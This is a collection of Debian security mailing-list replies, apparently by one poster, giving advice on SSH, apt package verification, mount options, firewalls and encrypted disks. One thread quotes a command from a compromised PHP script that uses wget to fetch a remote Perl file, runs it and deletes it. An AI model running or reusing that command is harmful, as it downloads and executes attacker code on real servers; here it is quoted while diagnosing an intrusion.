Re: instantbird: modified libpurple
In article 0e753136-d929-11de-9b6a-001cc0cda...@msgid.mathom.us you wrote: My inclination is to say that this sort of thing is largely unsupportable in a debian release. It's fine for unstable, but 2-3 years from now is anyone going to be writing patches for instantbird 0.1.3.1 and its forked version of libpurple? Hu? This is an open source project with a forked code base like any other project? Why dont you simply treat it as such? Gruss Bernd -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: HEAD's UP: possible 0day SSH exploit in the wild
In article f971bab40907080937v33884e78nce8291d34140f...@mail.gmail.com you wrote: Is there a way to force keys AND passwd verification? You know that if its a protocol exploit (which is quite likely) that will not help you much. tcpwrapper itself or ipfilter acts quite early in the protocol stack - that might help. Besides I dont think you can force both, its only one stage in ssh protocol. But your login shell could ask for the password via Terminal. Maybe with pam.. Greetings Bernd -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Securing my PC at a Wireless Hotspot?
In article fe374f8d0902081747v4a99deadva1898142dac1d...@mail.gmail.com you wrote: Use a VPN or an SSH tunnel to a trusted source. A very neat trick is using dynamic port forwarding of SSH (-D 1080). You only need to login to any SSH Server and enable the auto forwarding. Then you can enter the SSH client as a SOCKS proxy server and you are done (for surfing). Gruss Bernd -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Out of office replies
In article e2e2e5500901162250s61454d0bh76d73469bfaef...@mail.gmail.com you wrote: So first prize is not having to use an auto-reply at all. Second prize is one that checks for common headers at the very least. If you don't have enough control over this (for example you're running exchange) you should either not subscribe that email address to a list, or you should not use the vacation feature. Exchnage is observing the precedence: list header. What I had done is a exim smarthost with some filters (like if From: *-owner@) just adding the precendence header to stop auto answers to lists which do not set the headers right. Ultimately the problem is on the site of the list software (in the case of missing header). Gruss Bernd -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Out of office replies
In article 42670320901170344i4a7eb397g5522af4b38375...@mail.gmail.com you wrote: Considering the wide number of installs of Exchange, you'd think they'd eventually fix that *in* Exchange Exchanged does the right thing. Gruss Bernd -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: basically security of linux
In article 20090117002104.ga...@wolfden.dnsalias.net you wrote: /tmp as tmpfs, but then we have /var/tmp (which can't be tmpfs, because it's purpose is to retain the files even across reboots). It is just supposed to hold larger data. No persistence in /var/tmp over reboots required. I haven't tried it yet, but could a bind-mount be done (e. g. /var/real-tmp - /var/tmp) with additional options nosuid,nodev,... (while /var or / is mounted suid,dev,...)? I am mounting /var as noexec, this works most of the time (dpkg has some problems on install. But since I also run with ro-root, i have a pre-install script which changes both mount options before I use apt). Gruss Bernd -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Certification Authorities are recommended to stop using MD5 altogether
In article 0901011447100.8...@somehost you wrote: Signature Algorithm: md5WithRSAEncryption ^ should be distributed at all. Yes, because it is the self signature, but since we distribute the CA certificate it is not checked but trusted. The question is if this CA signes its issued certificates in a safe way or not. Gruss Bernd -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: md5 hashes used in security announcements
In article [EMAIL PROTECTED] you wrote: I assume, it's tradition from the times, when only few people used apt-get and friends (and many years apt-get did not have signature support). A pointer to a generic description for people who don't want to/cannot use apt-get would be sufficient nowadays. Could someone from the security team correct me? What I would much more prefer is a regularly signed list of (non)announcements. This will make shure that anybody can verify if he is not receiving alerts. If a entity is supressing updates to the list, you see the missing signature. Kinda CRL for Packages. Then the alerts can skip URLs and Checksums, since if there is somebody who parses them (instead of apt) to be shure his mirrors are not a old copy can use the new more reliable list. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Mass-updating cached hosts keys afrer ssh security upgrade?
In article [EMAIL PROTECTED] you wrote: I've been trying to go through all the known_hosts files manually and update them to give my users a break, but it's a tedious nightmare. Adding to the complexity is that many of the known_hosts files are armored (the hostname/ip address is not in plain text). What kind of hosts are those? I would add all your machines to all system-known_hosts and then delete the entries from user files. The later can be done with a shell script, and you should ask your users to run it themself. Just consisting of a loop, reading the hosts from /etc/ssh/known_hosts and deleting them via ssh-keygen -R $host Greetings Bernd y -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Microsoft-IIS/6.0 serves up Debian... WTF!
In article [EMAIL PROTECTED] you wrote: It's mirror's like that, that make me paranoid about Debian Security. Why is that? IIS is the second most used web server on the market. And since mirrors are not a trusted part of software distribution anyway, I dont see an issue here. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: realpath in PS1 bash
In article [EMAIL PROTECTED] you wrote:
I'm wondering if it would be a good idea to have PS1 set to
'${debian_chroot:+($debian_chroot)[EMAIL PROTECTED]:$(realpath $(pwd))\$ '
Personally I dont like having the shell spawn a executable. Since this will
slow down administration on heavyly loaded systems. Maybe \pwd -P as a
shell builtin acts a bit nicer. However I am not sure if it results in the
same path in all cases. And it is still traversing lots of inodes.
Gruss
Bernd
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: securing server
In article [EMAIL PROTECTED] you wrote: I already did the followings: - installed chkrootkit - installed fail2ban (for ssh and proftpd) Beware of DOS. - allow only one user (not root) via /etc/ssh/sshd_config, only ssh v2 If you have multiple administrators, you should not do that. Would you please list me which packages to install and which rules to apply ? There are some hardening packages to look for. Beside that you should review all running processes and turn those off which you dont need (X11 related, rpc, hotplug stuff, etc) Besides that, what applications you plan to run? Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Question about Security
In article [EMAIL PROTECTED] you wrote: system, this system Will be running in a data center and i don't want to have downtime ! Hardware i use = server 1 x86 (hp ML330) server 2 IA64bit (HP rx1620) The first thing you need to do is to limit yourself to a single platform. This helps with patches, images, hardware replacements and will greatly affect your downtimes. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: securing server
In article [EMAIL PROTECTED] you wrote: * Change the ports of most ports like ssh, ftp, smtp, imap etc. from the default ones to some other ones. From my poor understanding of security related issues, I guess this is totally useless since any (good) port scanner will defeat this without any problem. Remember, security by obscurity is a bad idea. It helps to keep the noise in the logs low. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apt-get may accept inconsistent data
In article [EMAIL PROTECTED] you wrote: Apt-get should not even send an If-Modified query imho. After fetching the Release file is already knows with near certainty if the local file is current or not. It should check the Checksums of the local file and then either keep it or fetch it. Asking If-Modified-Since can only lead to triggering a bug like the squid one. It would be possible to not base the if-modifed-since on the file time but on a date header inside the file. But in that case the mirrors will have to react reasonable well to that. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities
In article [EMAIL PROTECTED] you wrote: Apropos. Is there a way to get that information from a vmlinuz file on disk? Without booting it, that is. Interesting enough my (somewhat older) file command does only print x86 boot sector, but I think some magic files supported it. Otherwise you can use strings vmlinux | fgrep 2. I usually use the file name to describe it. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: How to verify package integrity after they have been downloaded?
In article [EMAIL PROTECTED] you wrote: If you are talking about automating the verification process, that wouldn't quite work. The system that downloads the packages might have been compromised. The files that I would sign on that system might have been already modified at the time when I sign them. Yes you are right, does not work in your scenario. But you can use the unsecure system as a proxy and use apt-get/secure on the trusted machine. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: How to verify package integrity after they have been downloaded?
In article [EMAIL PROTECTED] you wrote: If some packages are localy modified, This suggests that your local system is already compromised. Not if you use a NFS mounted shared cache. It should be possible to verify the package on install time. (Especially when not using apt-get). Not sure if debsig-verify can work in that environment. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: How to verify package integrity after they have been downloaded?
In article [EMAIL PROTECTED] you wrote: I trust the archive maintainers and have a secure way to get a copy of their public key. I don't trust individual developers and cannot have all of their keys securely distributed to me. Yes, you would have to sign the packages with your own key after verifying the release file. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1447-1] New tomcat5.5 packages fix several vulnerabilities
In article [EMAIL PROTECTED] you wrote: (java.io.FilePermission /home/nihil/www/java/WEB-INF/classes/logging.properties read) (it worked before the update and permission are set correctly, i double checked) This is a java security policy violation, not related to OS file permissions. Maybe you started it with security policy and did not before? Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: netstat shows strange output
In article [EMAIL PROTECTED] you wrote: tcp0 0 192.168.1.240:www ba.2c.5646.static:34884 FIN_WAIT2 You sure 192.168.1.240 is none of your addresses? Please post an ifconfig output as well as netstat -tn. I've blocked this IP (resolves to 18255.com) on this machine using iptables -I INPUT -s 66.116.125.131 -j DROP What has 18255.com with the above lines to do? Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: ping22: can not kill this process
In article [EMAIL PROTECTED] you wrote: It is for example used to map shared memory. ... No, it is a tmpfs directory for temporary files. It has nothing to do with shared memory. why do you think it is named shm? it is used for shm_open and shm_unlink. (where glibc used temporary files to mmap them) On some systems (like mine) tmp is a symlink to it, or you use a second instance of tmpfs. However is still is used for share memory (only). Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: ping22: can not kill this process
In article [EMAIL PROTECTED] you wrote: Ah, I see. I have never come across a program (yet) that uses it for shared memory. Perhaps I'm just running the wrong programs. The program itself is not using it, its glibc2.2 which does use that (for POSIX shm, I think not for SYSV. so its quite seldom used). I need to double check, but one possible user could be Java with -XX:+UseLargePages if it does not use hugetlbfs. Actually, some things use /dev/shm for non-shared-memory purposes. Like the resolvconf package. I would consider that a bug, but sure possible. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: ping22: can not kill this process
In article [EMAIL PROTECTED] you wrote:
I found the issue, it is one of the php script allowing the
remote script to run.
This is a typical Apache exploit where remote fileuploads are possible.
passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
bb.txt;rm -f bb.txt*');
what kind applications are using /dev/shm? I googled
around,seem not find much information.
right now I mount i as rw,noexec,nosuid.
It is for example used to map shared memory. I am not sure, but I think
noexec and nodev is possible. However this does not solve your problem of a
insecure web app.
Gruss
Bernd
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: ping22: can not kill this process
In article [EMAIL PROTECTED] you wrote: www-data 16848 1 14 14:01 ?00:06:07 ping22 Looks like it is started from Apache, most likely a CGI. Have a look at CWD of that process or look into the access log. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1438-1] New tar packages fix several vulnerabilities
In article [EMAIL PROTECTED] you wrote: These releases are called 'point releases' and are prepared publicly. Preperation mails to these point releases are periodicly sent to [EMAIL PROTECTED] Also prior releases had 'Miscellaneous Bugfixes', see eg. [2]. The list of 'Miscellaneous Bugfixes' just got a bit bigger, as the last point releases was for various reasons not 2 but 6 month ago. Hmmm, I think pushing point releases via the package pool and preparing a new release directory would limit the confusion. I dont see a need to make those packages available on security.d.o. I think in the past we did exactly that with proposed-updates. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Permission changes with rsync
In article [EMAIL PROTECTED] you wrote: I used rsync -av from source to target. (O.k., I missed to add --numeric-ids, which resulted in getting some files with numeric owners), But other files on the target got wrong owners or groups ! So, this should not happen, IMO ! 1. are you root? 2. what is the numeric uid on source and target? (use ls -n) 3. on some? are those all belong to one user or dot files or existing/non existing= 4. can you manually change the ownership? (what is the filesystem type, does it allow userids?) Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: fail2ban vs. syslogd compression
In article [EMAIL PROTECTED] you wrote: Wouldn't a better option be to teach fail2ban how to parse the last message repeated.. messages? Maxim or Dann: When you find out how to do that, please post it to the list for archiving / information-sharing purposes. I can tell you the obvious: rember last and current line. If current line!=last message repeated then store it as last line and read next line as current otherwise increment counter of the entry pointed to in last line by the number of lines skiped and read next line as current. *g* Sorry no coding today :) Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Time to replace MD5?
In article [EMAIL PROTECTED] you wrote: Then they can wget the Release.gpg file, Release file, Packages file and check each in turn. Their choice. Which is much more complicated than checking a given fingerprint (which is very usual for Advisories) Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: ftpd - security thread ?
In article [EMAIL PROTECTED] you wrote: to certain IP address on port 80. With simple bash script I have captured output of netstat while the ftpd package is getting installed: try tcpdump, maybe it helps us if we know the content of that connection. that IP address without me actually knowing about that? To me it seems as a security thread. At the moment it appears that this happens only if ftpd package is installed for a first time so # dpkg -P ftpd # apt-get install ftpd does not create any connections. So you need to re-install debian to reproduce it? or how can you trigger it? Are you installing it from CD? how does your apt/sources.list looks like? Do you mean 4.0 or 3.1 debian stable? Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Security Debian Questions
In article [EMAIL PROTECTED] you wrote: I read in there that it's preferred to set-up separate partitions for mount points such as /tmp, /var/tmp, /home. I would recommend to use tmpfs for /tmp and have a MP for /var. On a Firewall you dont need /home. /usr and / would be RO. If you need a disk based /var/tmp or not depends on the applications. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Can ssh host keys be added to a gpg keyring?
In article [EMAIL PROTECTED] you wrote: I'm trying to design a backup solution where the backups are encrypted with a key thats specific to the host (rather than to users on the host). The sshd key seems to be a good fit for this, but ssh doesnt seem to provide encryption / decryption tools. GPG does, but I cant figure out how to add the ssh server key to the GPG keyring. Can this be done? Is there a better alternative that I'm missing? Create one key for each purpose. I.e. as root create a GPG Backup key for each host. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: This is an very serious bug
In article [EMAIL PROTECTED] you wrote: This bug really should have critical or release-critical as severity level. It almost caused an production box with debian sarge to break. (/var filesystem full) which bug, please? Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] Re: email notifications when users login
In article [EMAIL PROTECTED] you wrote: Thanks Michelle that worked perfect. Is there an easy variable I could throw in there that you know off hand which would include the time (MM/DD/) as well? NOW=`date` Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: su - and su - what is the real difference?
Michael Marsh [EMAIL PROTECTED] wrote: know if it really solves the same problem. One problem it *does* solve is being able to disable the root access of someone who is no longer on the admin staff without having to change the root password. This is better solved by using sudo and not giving out the root password at all. However both methods are not really ensuring that an admin who once had root access cannot use one of the backdoors or missconfigurations he has introduced to gain back that trust level. Unless you really are paranoid in monitoring your sysadmins, there is no real way to lock them out. Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Request for comments: iptables script for use on laptops.
Mike Dornberger [EMAIL PROTECTED] wrote: If I set up my firewall to accept only my local network (eg. -s 192.168.0.0/255.255.255.0) connecting to a port (eg. smtp), then anyone can spoof that too. So what's the point of creating rules? :) even if one can spoof the IP, he (= the attacker) can't do very much more (assuming, he can't read local traffic), at least with TCP connection. And he needs to get around the ingress spoof filter. You of course dont accept ip packets with the internal addresses on the external interface. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Logauswertung
Andreas [EMAIL PROTECTED] wrote: Mein Problem mit welchem Tool werte ich die Logs auf Angriffe aus (z. b. Portscans) und maile Sie mir zu. Ich weiss, die Frage wolltest du nicht hören, aber ich stelle sie doch mal: wozu? Ich wuerde die Logs zu Archivzwecken vorhalten. Einzelne geblockte Angriffe oder Portscans passieren so oft... Viel besser ist es counter zu monitoren um DOS Angriffe oder Fehlkonfiguration zu erkennen und wenn man Angst vor Intrusion hat intern ein paar Regeln aufzusetzen die Alarme ausloesen wenn deren Counter anspringen (ausgeende Verbindungen, Connection Versuche zu Domain Controllern...) Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: encrpyt harddrive without passphrase/userinput
Horst Pflugstaedt [EMAIL PROTECTED] wrote: a) it must be able to boot (remotely) without userinput/passphrase You can use nfs-root or initramdisk from a trusted machine. b) the importtant partitions such as /etc, /var, /usr and /home must be encrypted/protected. I just ask myself why you bother encrypting a filesystem that will be accessible to anyone having access to the machine since it boots without password? No password entry does not mean nopassword. A remote server for the password can ensure, that the machine can only boot on the right subnet and allows easy earising of all data by deleting the key on the server. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: getting to www servers from inside where they have an Internal IP
martin f krafft [EMAIL PROTECTED] wrote: None that I know. I suggest using a second nameserver to resolve the A record to the internal IP. split brain dns Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Security implications of tty group?
Thomas Hood [EMAIL PROTECTED] wrote: What are the security implications of a tty device node failing to belong to group tty? It depends on who has access to that group, what are the permissions of the tty and what is intended. Generally you want to restrict write access to a tty to a trusted person, because otherwise she can use escape sequences to cause all kind of provblems (reprogramming keyboard, playing ascii movies, reading screen). write(1) can filter messages, and it enforces the clean-ness. Therefore it uses sguid tty. So if a user says mesg yes she wants actually allow write access and not raw access. Thats why a warning is a good thing. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Security implications of allowing init to re-exec from another path
martin f krafft [EMAIL PROTECTED] wrote: ... sounds like a nice way to infest a system with a trojan, in addition to kernel modules and other Linux maladities. That is, if the attacker gets root... However, root can also patch the init image and get the same result. So it is better if init is actually supporting this, logging it and manipulating the cmdline so that it is obvious. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: hardening checkpoints
In article [EMAIL PROTECTED] you wrote: Actually, iptables -A INPUT will _append_ a rule to your INPUT chain (iptables(8)), and this won't help you if your connection is matched by an earlier blocking rule. To really make sure that you can reach the machine after a failed firewall-reconfiguration, replace -A with -I, which makes the rule inserted at the head of the chain, and hence, the first rule to be matched. And dont forget to do this to the other tables, at least OUTPUT, also. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: hardening checkpoints
In article [EMAIL PROTECTED] you wrote: BTW - FTP *has* to be available - many of the users only know how to use FTP. give them WinSCP :) Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Port 699 listening
In article [EMAIL PROTECTED] you wrote: netstat -na | grep 699 tcp0 0 0.0.0.0:699 0.0.0.0:* LISTEN if you run it as root and use netstat -lnpo it will give you the pid and process name of the open listening socket. In some rare cases netstat wont help, then you could use lsof -i :699 also (as root). Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Question about iptables
In article [EMAIL PROTECTED] you wrote: Chain INPUT (policy DROP) target prot opt source destination ACCEPT all -- anywhere anywhere The first line does not includ state Related, established or state established... Does it mean that all trafic will be allowed ? yes. A network scan shows me that all packets are dropped !!! maybe in the OUTPUT or FORWARDING rules? what kind of scan? try to look for counters and other hints with -v. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: What is a security bug?
In article [EMAIL PROTECTED] you wrote: Well, obviously it is not a _security_ bug, since it has nothing to do with security. ... well, that's obviously for me, but maybe someone else has a different opion about this issue? Your definition and mine of security are not compatible :) (availability is a security discipline and a DOS is a security attack for me). But I think we had this discussion before on this list... However it doesnt matter, you are right: critical application crashes (especially if triggerable by untrusted peers) are critical enough to be fixed anyway. AND crashes often have the potential to be exploitable (stacksmashing?). Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: whitehat to test a security config
On Fri, Nov 04, 2005 at 01:19:36AM +0100, Javier Fernández-Sanguino Peña wrote: But also somewhat wrong: a black-box test is much cheaper than a full security audit of a system. Well, I guess you mean port scan. A Tiger Team who helps your security is most often quite expensive cause it takes a lot of attacks - including on-site social engeneering. To run nessus you do not need to spend any money, thats right. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: whitehat to test a security config
In article [EMAIL PROTECTED] you wrote: I'm looking for (preferably) a company, or individual, to attempt to breach a standard config I have created to deploy client applications in production. It is intentionally a minimal config which is tightly locked down and audited daily. I think it is very bad efficiency to do black-box testing. Because it requires a very good attacker and much time to find a problem. And if you dont find one, you can't be shure you are secure. It is much better to let the external auditor verify your configuration. Give them access to all config files and documentation, your risk matrix etc. This is much cheaper and much more sucessfull. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: CAN to CVE: changing changelogs?
In article [EMAIL PROTECTED] you wrote: Wouldn't one of the goals of the change to just one name instead of two per issue be to facilitate things like googling, grepping and other searching on CVE id's? Then it would make sense to unify the names as widely as possibe. Those issues are old, and the work to look up the new ids and change them is quite big. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: WTF: Debian security, ex. Linux kernel vulnerabilities
In article [EMAIL PROTECTED] you wrote: Don't let primary mirrors pull, push the updates to them. Make the mirrors simple reverse http caches for the packages. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Abwesenheit
In article [EMAIL PROTECTED] you wrote: Is there a reason not to simply read the Precedence: list header and simply not respond at all ? BTW: Exchnage Server does this. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apache2 forwarding emails
In article [EMAIL PROTECTED] you wrote: I stopped down apache2 temporarily now. Does it help to stop apache? I see some possible sources for this post requests: a) directly by an brwser (unlikely, check client ip) b) by a client behind squid (likely, check squid log) c) by apache redirect/proxy (see below) d) by an forwarding cgi on apache (unlikely, check access log) If you claim it helps to shut down apache, that please check if you have the proxy module enabled in apache and forget to secure it by acl. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: On Mozilla-* updates
In article [EMAIL PROTECTED] you wrote: Read this thread again. We do need an DSA. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: On Mozilla-* updates
In article [EMAIL PROTECTED] you wrote: If I recommend to use another operating system for a more special purpose, what's wrong here? It is just the wrong answer in a discussion where we look to improve Debian. I think it is valid to point to other systems for learning their weakness or strength, but it is not valid to consider them a as a geeral solution to a Debian problem. Said that, I do stil think that the Ubuntu is better suited for the Deskop exactly because the Software is fresher. And I do think a faster release schedule would also benefit Debian. We would concentrate much more on the overall progress. And the diversion to upstream is much less. Independently from that, I do think Mozillas Bugfix releases should go 1:1 into the Distribution. There is no major incompatibility and it is just wrong to expect the end user to understand about our backporting, especially with components which are so prominent. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: On Mozilla-* updates
In article [EMAIL PROTECTED] you wrote: Despite of the fact, the the release is probably unable to match the mozilla release cycles - do you really think, mozilla is the one and only package, debian is all about? Well, I mean the killer application, the thin that justify Debian? No but I think most of the desktop packages suffer from the slow release cycle. bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: On Mozilla-* updates
In article [EMAIL PROTECTED] you wrote: Be prepared for reality, in half a year or in one year, there won't be 1.0.x Mozilla Firefox packages anymore that build on Debian stable. At least that's what I anticipate. So lets solve this and release more often. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: a compromised machine
In article [EMAIL PROTECTED] you wrote: I still haven't managed to find out how exactly this happened. And probably reinstall will be needed? What do you think? Yes, reinstall on compromised hosts is always needed, however you should make a image of the system for forensic, you dont want to have that happen again. Maybe try to run some rootkit detectors. Is there a web server with PHP running on the system? any other server? Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Document the bug fix policy regarding PHP Safe Mode
In article [EMAIL PROTECTED] you wrote: Where does this observation come from and do we know whether it's true for debian? I certainly know a higher proportion of multi-user servers with PHP installed than the proportion of desktop systems I know with PHP. Yes i Think PHP is the only web server build in scripting language which is widely in use by web hosters. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: getting the MAC address from an ip
In article [EMAIL PROTECTED] you wrote: How can I get a machines mac address, if I only know it's ip? if it is on your local network you can ping it and then use arp -a. If it is remote you cant. (you need to login or use other applications which use the mac for stuff like uuid generation) BTW: this is a linux user question. Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: safety of encrypted filesystems
In article [EMAIL PROTECTED] you wrote: You could always run tripwire on the mounted file system, unmount it, change your block, remount it, and run a tripwire check. This should identify *WHICH* file changed. he has only one file and this was unaltered, the question is why. Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: safety of encrypted filesystems
In article [EMAIL PROTECTED] you wrote: Of course blocks are small, e.g. 64 bytes. However, doesn't CBC or EBC make sure that every block is chained to its predecessor, making even the very last block of a file dependent on the bits of the very first block? It is therefore better to use counter mode for clusters. Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: safety of encrypted filesystems
In article [EMAIL PROTECTED] you wrote: So encrypted block devices are not really more dangerous than clear-text in the end... I suppose with AES you end up losing at least 64 bytes of data, which could be less without encryption... You lose much more with RAID-5, yes. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: safety of encrypted filesystems
In article [EMAIL PROTECTED] you wrote: Nope. Someone raised the point of a file with all zeroes being possibly sparse, but I don't think that's the case if I wrote it with have you unmounted the file before writing to it? perhaps you changes was overwritten with the blok from cache -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Crypto File System-Problems Creating One
